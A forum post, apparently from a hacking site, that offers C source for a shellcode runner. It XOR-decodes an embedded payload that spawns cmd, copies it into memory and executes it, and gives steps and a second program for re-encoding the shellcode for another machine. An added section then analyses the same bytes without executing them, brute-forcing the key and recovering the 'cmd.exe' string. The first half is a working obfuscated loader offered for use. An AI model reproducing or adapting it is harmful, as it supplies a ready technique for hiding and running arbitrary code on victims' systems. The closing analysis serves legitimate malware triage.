Here you go, an example of how this is done.
#include <stdio.h>
#include <stdlib.h>   // malloc()
#include <string.h>   // strlen(), memset()
#include <windows.h>
int main()
{
    LoadLibrary("msvcrt.dll"); // We need to be sure that system() is loaded in our address space.
    void (*pFun)(void); // A function pointer. Right now it points nowhere.
    // This is a system("cmd"); shellcode, XORed byte by byte with 0x20.
    char cryptedCode[]="\x75\xA9\xC5\x11\xDF\x77\xCB\x21\xA3\xA3\xCC\x24\xE6\x65\xD8\x43\xE6\x65\xD9\x4D\xE6\x65\xDA\x44\xE6\x65\xDB\x0E\xE6\x65\xDC\x45\xE6\x65\xDD\x58\xE6\x65\xDE\x45\xAD\x65\xD8\x70\x9B\x4F\x91\x28\x55\xDF\xF3";
    char *code=(char *)malloc(strlen(cryptedCode)); // Here will go the decrypted code
    memset(code, 0x90, strlen(cryptedCode)); // Nothing to explain here, just fill it with NOPs
    // This is the decrypt method. Just a [byte]^0x20 xor
    int i;
    for(i=0; i<strlen(cryptedCode); i++) *(code+i)=(unsigned char)(cryptedCode[i]^0x20);
    pFun=(void (*)(void))code; // Point the function pointer at our in-memory decrypted code
    pFun(); // And execute it.
    return 0;
}
Note that it will crash on your PC, because I use a hardcoded address of the system() function that may not be the same on your computer. In fact, in Windows 7 it changes every time the computer boots. If you want to test it, do the following:
- Use this (http://evilzone.org/c-c/findaddress/) and get the system() offset in msvcrt.dll
- Use this (http://evilzone.org/c-c/opcodeprint/), changing "movl $0x7573b16f, %ebx;" (put the address you got in the previous step in place of 7573b16f). Print that shellcode.
- Use this to get a crypted shellcode:
#include <stdio.h>
#include <string.h>   // strlen()
int main()
{
    char shellcode[]="Here goes the shellcode you have just printed.";
    int i;
    // Same [byte]^0x20 transform as the decrypt loop, printed as \xNN escapes
    for(i=0; i<strlen(shellcode); i++) printf("\\x%02x", (unsigned char)(shellcode[i]^0x20));
    return 0;
}
- Put this last crypted shellcode in the first code I put in the post, and you've got it.
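From the analyst's side, as an added example that is not the poster's code: when a byte blob like the one above turns up in a sample, a single-byte XOR key is recovered by brute force against a known-plaintext crib, and the string the decoded code builds on the stack one byte at a time is pulled out without ever executing the buffer. The encoded bytes are the ones from the post; the crib (the "push ebp; mov ebp, esp" prologue, 55 89 E5) and the "mov byte [ebp+disp8], imm8" pattern (C6 45 xx yy) are assumptions about what compiler-generated code of this kind looks like.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* The XOR-encoded byte string from the post above, copied as the sample input. */
static const unsigned char kEncoded[] = {
    0x75, 0xA9, 0xC5, 0x11, 0xDF, 0x77, 0xCB, 0x21, 0xA3, 0xA3, 0xCC, 0x24,
    0xE6, 0x65, 0xD8, 0x43, 0xE6, 0x65, 0xD9, 0x4D, 0xE6, 0x65, 0xDA, 0x44,
    0xE6, 0x65, 0xDB, 0x0E, 0xE6, 0x65, 0xDC, 0x45, 0xE6, 0x65, 0xDD, 0x58,
    0xE6, 0x65, 0xDE, 0x45, 0xAD, 0x65, 0xD8, 0x70, 0x9B, 0x4F, 0x91, 0x28,
    0x55, 0xDF, 0xF3
};

/* Known-plaintext crib (assumption): the 32-bit function prologue
   "push ebp; mov ebp, esp" (55 89 E5) that such code usually starts with. */
static const unsigned char kPrologue[] = { 0x55, 0x89, 0xE5 };

/* Try all 256 single-byte keys; return the first key under which the crib
   appears anywhere in the decoded buffer, or -1 if no key produces it. */
int find_xor_key(const unsigned char *buf, size_t len,
                 const unsigned char *crib, size_t criblen)
{
    for (int key = 0; key < 256; key++) {
        for (size_t off = 0; off + criblen <= len; off++) {
            size_t i = 0;
            while (i < criblen && (buf[off + i] ^ key) == crib[i])
                i++;
            if (i == criblen)
                return key;
        }
    }
    return -1;
}

/* Decode len bytes of in with a single-byte XOR key into out. */
void xor_decode(const unsigned char *in, size_t len, unsigned char key,
                unsigned char *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Recover a string that the decoded code builds on the stack one byte at a
   time with "mov byte [ebp+disp8], imm8" (opcode C6 45 <disp8> <imm8>).
   Immediates are collected in order of appearance; returns the string length. */
size_t extract_stack_string(const unsigned char *code, size_t len,
                            char *out, size_t outlen)
{
    size_t n = 0, i = 0;
    while (i + 4 <= len && n + 1 < outlen) {
        if (code[i] == 0xC6 && code[i + 1] == 0x45) {
            out[n++] = (char)code[i + 3];
            i += 4;
        } else {
            i++;
        }
    }
    out[n] = '\0';
    return n;
}

/* Run the whole analysis on the sample: recover the key, decode, and pull out
   the stack-built string. Returns "" if the crib was not found under any key. */
const char *analyze_sample(void)
{
    static char str[64];
    unsigned char decoded[sizeof kEncoded];
    int key = find_xor_key(kEncoded, sizeof kEncoded, kPrologue, sizeof kPrologue);
    str[0] = '\0';
    if (key < 0)
        return str;
    xor_decode(kEncoded, sizeof kEncoded, (unsigned char)key, decoded);
    extract_stack_string(decoded, sizeof decoded, str, sizeof str);
    return str;
}

int main(void)
{
    int key = find_xor_key(kEncoded, sizeof kEncoded, kPrologue, sizeof kPrologue);
    printf("single-byte XOR key: 0x%02x\n", key);
    printf("string built on the stack: \"%s\"\n", analyze_sample());
    return 0;
}
```

The crib search is robust to the key because a single-byte XOR preserves the XOR difference between neighbouring bytes, so only a key that maps the bytes at one offset exactly onto 55 89 E5 survives; for this sample that is 0x20 at offset 0, and the decoded code builds "cmd.exe" on the stack. Nothing is executed in the process, which is the point when triaging an unknown buffer.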